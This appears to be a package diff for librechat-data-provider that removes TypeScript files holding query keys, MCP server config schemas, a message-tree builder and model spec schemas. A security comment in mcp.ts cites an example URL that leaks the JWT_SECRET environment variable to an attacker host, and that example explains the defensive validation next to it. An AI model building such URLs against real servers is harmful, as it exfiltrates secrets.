librechat-data-provider 0.8.402 → 0.8.404

package/src/keys.ts

@@ -1,99 +0,0 @@
-export enum QueryKeys {
-  messages = 'messages',
-  sharedMessages = 'sharedMessages',
-  sharedLinks = 'sharedLinks',
-  allConversations = 'allConversations',
-  archivedConversations = 'archivedConversations',
-  searchConversations = 'searchConversations',
-  conversation = 'conversation',
-  searchEnabled = 'searchEnabled',
-  user = 'user',
-  name = 'name', // user key name
-  models = 'models',
-  balance = 'balance',
-  endpoints = 'endpoints',
-  presets = 'presets',
-  searchResults = 'searchResults',
-  tokenCount = 'tokenCount',
-  availablePlugins = 'availablePlugins',
-  startupConfig = 'startupConfig',
-  assistants = 'assistants',
-  assistant = 'assistant',
-  agents = 'agents',
-  agent = 'agent',
-  files = 'files',
-  fileConfig = 'fileConfig',
-  tools = 'tools',
-  toolAuth = 'toolAuth',
-  toolCalls = 'toolCalls',
-  mcpTools = 'mcpTools',
-  mcpConnectionStatus = 'mcpConnectionStatus',
-  mcpAuthValues = 'mcpAuthValues',
-  agentTools = 'agentTools',
-  actions = 'actions',
-  assistantDocs = 'assistantDocs',
-  agentDocs = 'agentDocs',
-  fileDownload = 'fileDownload',
-  voices = 'voices',
-  customConfigSpeech = 'customConfigSpeech',
-  prompts = 'prompts',
-  prompt = 'prompt',
-  promptGroups = 'promptGroups',
-  allPromptGroups = 'allPromptGroups',
-  promptGroup = 'promptGroup',
-  categories = 'categories',
-  randomPrompts = 'randomPrompts',
-  agentCategories = 'agentCategories',
-  marketplaceAgents = 'marketplaceAgents',
-  roles = 'roles',
-  conversationTags = 'conversationTags',
-  health = 'health',
-  userTerms = 'userTerms',
-  banner = 'banner',
-  /* Memories */
-  memories = 'memories',
-  principalSearch = 'principalSearch',
-  accessRoles = 'accessRoles',
-  resourcePermissions = 'resourcePermissions',
-  effectivePermissions = 'effectivePermissions',
-  graphToken = 'graphToken',
-  /* MCP Servers */
-  mcpServers = 'mcpServers',
-  mcpServer = 'mcpServer',
-  /* Active Jobs */
-  activeJobs = 'activeJobs',
-  /* Agent API Keys */
-  agentApiKeys = 'agentApiKeys',
-}
-
-// Dynamic query keys that require parameters
-export const DynamicQueryKeys = {
-  agentFiles: (agentId: string) => ['agentFiles', agentId] as const,
-} as const;
-
-export enum MutationKeys {
-  createAgentApiKey = 'createAgentApiKey',
-  deleteAgentApiKey = 'deleteAgentApiKey',
-  fileUpload = 'fileUpload',
-  fileDelete = 'fileDelete',
-  updatePreset = 'updatePreset',
-  deletePreset = 'deletePreset',
-  loginUser = 'loginUser',
-  logoutUser = 'logoutUser',
-  refreshToken = 'refreshToken',
-  avatarUpload = 'avatarUpload',
-  speechToText = 'speechToText',
-  textToSpeech = 'textToSpeech',
-  assistantAvatarUpload = 'assistantAvatarUpload',
-  agentAvatarUpload = 'agentAvatarUpload',
-  updateAction = 'updateAction',
-  updateAgentAction = 'updateAgentAction',
-  deleteAction = 'deleteAction',
-  deleteAgentAction = 'deleteAgentAction',
-  revertAgentVersion = 'revertAgentVersion',
-  deleteUser = 'deleteUser',
-  updateRole = 'updateRole',
-  enableTwoFactor = 'enableTwoFactor',
-  verifyTwoFactor = 'verifyTwoFactor',
-  updateMemoryPreferences = 'updateMemoryPreferences',
-}

package/src/mcp.ts

@@ -1,271 +0,0 @@
-import { z } from 'zod';
-import { TokenExchangeMethodEnum } from './types/agents';
-import { extractEnvVariable } from './utils';
-
-const BaseOptionsSchema = z.object({
-  /** Display name for the MCP server - only letters, numbers, and spaces allowed */
-  title: z
-    .string()
-    .regex(/^[a-zA-Z0-9 ]+$/, 'Title can only contain letters, numbers, and spaces')
-    .optional(),
-  /** Description of the MCP server */
-  description: z.string().optional(),
-  /**
-   * Controls whether the MCP server is initialized during application startup.
-   * - true (default): Server is initialized during app startup and included in app-level connections
-   * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
-   *   requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
-   */
-  startup: z.boolean().optional(),
-  iconPath: z.string().optional(),
-  timeout: z.number().optional(),
-  /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
-  sseReadTimeout: z.number().positive().optional(),
-  initTimeout: z.number().optional(),
-  /** Controls visibility in chat dropdown menu (MCPSelect) */
-  chatMenu: z.boolean().optional(),
-  /**
-   * Controls server instruction behavior:
-   * - undefined/not set: No instructions included (default)
-   * - true: Use server-provided instructions
-   * - string: Use custom instructions (overrides server-provided)
-   */
-  serverInstructions: z.union([z.boolean(), z.string()]).optional(),
-  /**
-   * Whether this server requires OAuth authentication
-   * If not specified, will be auto-detected during construction
-   */
-  requiresOAuth: z.boolean().optional(),
-  /**
-   * OAuth configuration for SSE and Streamable HTTP transports
-   * - Optional: OAuth can be auto-discovered on 401 responses
-   * - Pre-configured values will skip discovery steps
-   */
-  oauth: z
-    .object({
-      /** OAuth authorization endpoint (optional - can be auto-discovered) */
-      authorization_url: z.string().url().optional(),
-      /** OAuth token endpoint (optional - can be auto-discovered) */
-      token_url: z.string().url().optional(),
-      /** OAuth client ID (optional - can use dynamic registration) */
-      client_id: z.string().optional(),
-      /** OAuth client secret (optional - can use dynamic registration) */
-      client_secret: z.string().optional(),
-      /** OAuth scopes to request */
-      scope: z.string().optional(),
-      /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
-      redirect_uri: z.string().url().optional(),
-      /** Token exchange method */
-      token_exchange_method: z.nativeEnum(TokenExchangeMethodEnum).optional(),
-      /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
-      grant_types_supported: z.array(z.string()).optional(),
-      /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
-      token_endpoint_auth_methods_supported: z.array(z.string()).optional(),
-      /** Supported response types (defaults to ['code']) */
-      response_types_supported: z.array(z.string()).optional(),
-      /** Supported code challenge methods (defaults to ['S256', 'plain']) */
-      code_challenge_methods_supported: z.array(z.string()).optional(),
-      /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
-      skip_code_challenge_check: z.boolean().optional(),
-      /** OAuth revocation endpoint (optional - can be auto-discovered) */
-      revocation_endpoint: z.string().url().optional(),
-      /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
-      revocation_endpoint_auth_methods_supported: z.array(z.string()).optional(),
-    })
-    .optional(),
-  /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
-  oauth_headers: z.record(z.string(), z.string()).optional(),
-  /**
-   * API Key authentication configuration for SSE and Streamable HTTP transports
-   * - source: 'admin' means the key is provided by admin and shared by all users
-   * - source: 'user' means each user provides their own key via customUserVars
-   */
-  apiKey: z
-    .object({
-      /** API key value (only for admin-provided mode, stored encrypted) */
-      key: z.string().optional(),
-      /** Whether key is provided by admin or each user */
-      source: z.enum(['admin', 'user']),
-      /** How to format the authorization header */
-      authorization_type: z.enum(['basic', 'bearer', 'custom']),
-      /** Custom header name when authorization_type is 'custom' */
-      custom_header: z.string().optional(),
-    })
-    .optional(),
-  customUserVars: z
-    .record(
-      z.string(),
-      z.object({
-        title: z.string(),
-        description: z.string(),
-      }),
-    )
-    .optional(),
-});
-
-export const StdioOptionsSchema = BaseOptionsSchema.extend({
-  type: z.literal('stdio').optional(),
-  /**
-   * The executable to run to start the server.
-   */
-  command: z.string(),
-  /**
-   * Command line arguments to pass to the executable.
-   */
-  args: z.array(z.string()),
-  /**
-   * The environment to use when spawning the process.
-   *
-   * If not specified, the result of getDefaultEnvironment() will be used.
-   * Environment variables can be referenced using ${VAR_NAME} syntax.
-   */
-  env: z
-    .record(z.string(), z.string())
-    .optional()
-    .transform((env) => {
-      if (!env) {
-        return env;
-      }
-
-      const processedEnv: Record<string, string> = {};
-      for (const [key, value] of Object.entries(env)) {
-        processedEnv[key] = extractEnvVariable(value);
-      }
-      return processedEnv;
-    }),
-  /**
-   * How to handle stderr of the child process. This matches the semantics of Node's `child_process.spawn`.
-   *
-   * @type {import('node:child_process').IOType | import('node:stream').Stream | number}
-   *
-   * The default is "inherit", meaning messages to stderr will be printed to the parent process's stderr.
-   */
-  stderr: z.any().optional(),
-});
-
-export const WebSocketOptionsSchema = BaseOptionsSchema.extend({
-  type: z.literal('websocket').optional(),
-  url: z
-    .string()
-    .transform((val: string) => extractEnvVariable(val))
-    .pipe(z.string().url())
-    .refine(
-      (val: string) => {
-        const protocol = new URL(val).protocol;
-        return protocol === 'ws:' || protocol === 'wss:';
-      },
-      {
-        message: 'WebSocket URL must start with ws:// or wss://',
-      },
-    ),
-});
-
-export const SSEOptionsSchema = BaseOptionsSchema.extend({
-  type: z.literal('sse').optional(),
-  headers: z.record(z.string(), z.string()).optional(),
-  url: z
-    .string()
-    .transform((val: string) => extractEnvVariable(val))
-    .pipe(z.string().url())
-    .refine(
-      (val: string) => {
-        const protocol = new URL(val).protocol;
-        return protocol !== 'ws:' && protocol !== 'wss:';
-      },
-      {
-        message: 'SSE URL must not start with ws:// or wss://',
-      },
-    ),
-});
-
-export const StreamableHTTPOptionsSchema = BaseOptionsSchema.extend({
-  type: z.union([z.literal('streamable-http'), z.literal('http')]),
-  headers: z.record(z.string(), z.string()).optional(),
-  url: z
-    .string()
-    .transform((val: string) => extractEnvVariable(val))
-    .pipe(z.string().url())
-    .refine(
-      (val: string) => {
-        const protocol = new URL(val).protocol;
-        return protocol !== 'ws:' && protocol !== 'wss:';
-      },
-      {
-        message: 'Streamable HTTP URL must not start with ws:// or wss://',
-      },
-    ),
-});
-
-export const MCPOptionsSchema = z.union([
-  StdioOptionsSchema,
-  WebSocketOptionsSchema,
-  SSEOptionsSchema,
-  StreamableHTTPOptionsSchema,
-]);
-
-export const MCPServersSchema = z.record(z.string(), MCPOptionsSchema);
-
-export type MCPOptions = z.infer<typeof MCPOptionsSchema>;
-
-/**
- * Helper to omit server-managed fields that should not come from UI
- */
-const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T) =>
-  schema.omit({
-    startup: true,
-    timeout: true,
-    sseReadTimeout: true,
-    initTimeout: true,
-    chatMenu: true,
-    serverInstructions: true,
-    requiresOAuth: true,
-    customUserVars: true,
-    oauth_headers: true,
-  });
-
-const envVarPattern = /\$\{[^}]+\}/;
-const isWsProtocol = (val: string): boolean => /^wss?:/i.test(val);
-const isHttpProtocol = (val: string): boolean => /^https?:/i.test(val);
-
-/**
- * Builds a URL schema for user input that rejects ${VAR} env variable patterns
- * and validates protocol constraints without resolving environment variables.
- */
-const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) =>
-  z
-    .string()
-    .refine((val) => !envVarPattern.test(val), {
-      message: 'Environment variable references are not allowed in URLs',
-    })
-    .pipe(z.string().url())
-    .refine(protocolCheck, { message });
-
-/**
- * MCP Server configuration that comes from UI/API input only.
- * Omits server-managed fields like startup, timeout, customUserVars, etc.
- * Allows: title, description, url, iconPath, oauth (user credentials)
- *
- * SECURITY: Stdio transport is intentionally excluded from user input.
- * Stdio allows arbitrary command execution and should only be configured
- * by administrators via the YAML config file (librechat.yaml).
- * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API.
- *
- * SECURITY: URL fields use userUrlSchema instead of the admin schemas'
- * extractEnvVariable transform to prevent env variable exfiltration
- * through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}).
- * Protocol checks use positive allowlists (http(s) / ws(s)) to block
- * file://, ftp://, javascript:, and other non-network schemes.
- */
-export const MCPServerUserInputSchema = z.union([
-  omitServerManagedFields(WebSocketOptionsSchema).extend({
-    url: userUrlSchema(isWsProtocol, 'WebSocket URL must use ws:// or wss://'),
-  }),
-  omitServerManagedFields(SSEOptionsSchema).extend({
-    url: userUrlSchema(isHttpProtocol, 'SSE URL must use http:// or https://'),
-  }),
-  omitServerManagedFields(StreamableHTTPOptionsSchema).extend({
-    url: userUrlSchema(isHttpProtocol, 'Streamable HTTP URL must use http:// or https://'),
-  }),
-]);
-
-export type MCPServerUserInput = z.infer<typeof MCPServerUserInputSchema>;

package/src/messages.ts

@@ -1,50 +0,0 @@
-import type { TFile } from './types/files';
-import type { TMessage } from './types';
-
-export type ParentMessage = TMessage & { children: TMessage[]; depth: number };
-export function buildTree({
-  messages,
-  fileMap,
-}: {
-  messages: (TMessage | undefined)[] | null;
-  fileMap?: Record<string, TFile>;
-}) {
-  if (messages === null) {
-    return null;
-  }
-
-  const messageMap: Record<string, ParentMessage> = {};
-  const rootMessages: TMessage[] = [];
-  const childrenCount: Record<string, number> = {};
-
-  messages.forEach((message) => {
-    if (!message) {
-      return;
-    }
-    const parentId = message.parentMessageId ?? '';
-    childrenCount[parentId] = (childrenCount[parentId] || 0) + 1;
-
-    const extendedMessage: ParentMessage = {
-      ...message,
-      children: [],
-      depth: 0,
-      siblingIndex: childrenCount[parentId] - 1,
-    };
-
-    if (message.files && fileMap) {
-      extendedMessage.files = message.files.map((file) => fileMap[file.file_id ?? ''] ?? file);
-    }
-
-    messageMap[message.messageId] = extendedMessage;
-
-    const parentMessage = messageMap[parentId];
-    if (parentMessage) {
-      parentMessage.children.push(extendedMessage);
-      extendedMessage.depth = parentMessage.depth + 1;
-    } else {
-      rootMessages.push(extendedMessage);
-    }
-  });
-
-  return rootMessages;
-}

package/src/models.ts

@@ -1,69 +0,0 @@
-import { z } from 'zod';
-import type { TPreset } from './schemas';
-import {
-  EModelEndpoint,
-  tPresetSchema,
-  eModelEndpointSchema,
-  AuthType,
-  authTypeSchema,
-} from './schemas';
-
-export type TModelSpec = {
-  name: string;
-  label: string;
-  preset: TPreset;
-  order?: number;
-  default?: boolean;
-  description?: string;
-  /**
-   * Optional group name for organizing specs in the UI selector.
-   * - If it matches an endpoint name (e.g., "openAI", "groq"), the spec appears nested under that endpoint
-   * - If it's a custom name (doesn't match any endpoint), it creates a separate collapsible group
-   * - If omitted, the spec appears as a standalone item at the top level
-   */
-  group?: string;
-  /**
-   * Optional icon URL for the group this spec belongs to.
-   * Only needs to be set on one spec per group - the first one found with a groupIcon will be used.
-   * Can be a URL or an endpoint name to use its icon.
-   */
-  groupIcon?: string | EModelEndpoint;
-  showIconInMenu?: boolean;
-  showIconInHeader?: boolean;
-  iconURL?: string | EModelEndpoint; // Allow using project-included icons
-  authType?: AuthType;
-  webSearch?: boolean;
-  fileSearch?: boolean;
-  executeCode?: boolean;
-  artifacts?: string | boolean;
-  mcpServers?: string[];
-};
-
-export const tModelSpecSchema = z.object({
-  name: z.string(),
-  label: z.string(),
-  preset: tPresetSchema,
-  order: z.number().optional(),
-  default: z.boolean().optional(),
-  description: z.string().optional(),
-  group: z.string().optional(),
-  groupIcon: z.union([z.string(), eModelEndpointSchema]).optional(),
-  showIconInMenu: z.boolean().optional(),
-  showIconInHeader: z.boolean().optional(),
-  iconURL: z.union([z.string(), eModelEndpointSchema]).optional(),
-  authType: authTypeSchema.optional(),
-  webSearch: z.boolean().optional(),
-  fileSearch: z.boolean().optional(),
-  executeCode: z.boolean().optional(),
-  artifacts: z.union([z.string(), z.boolean()]).optional(),
-  mcpServers: z.array(z.string()).optional(),
-});
-
-export const specsConfigSchema = z.object({
-  enforce: z.boolean().default(false),
-  prioritize: z.boolean().default(true),
-  list: z.array(tModelSpecSchema).min(1),
-  addedEndpoints: z.array(z.union([z.string(), eModelEndpointSchema])).optional(),
-});
-
-export type TSpecsConfig = z.infer<typeof specsConfigSchema>;